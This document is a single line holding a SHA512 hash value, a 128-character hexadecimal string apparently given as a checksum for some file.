SHA512b6e422783e7454af2dae11f894e751075b9a5573ba04c6c0cb6275843df12dbea02420780b923e49fc1de4ec226b87b98f49d1192fd091fb0cca102be6827d7a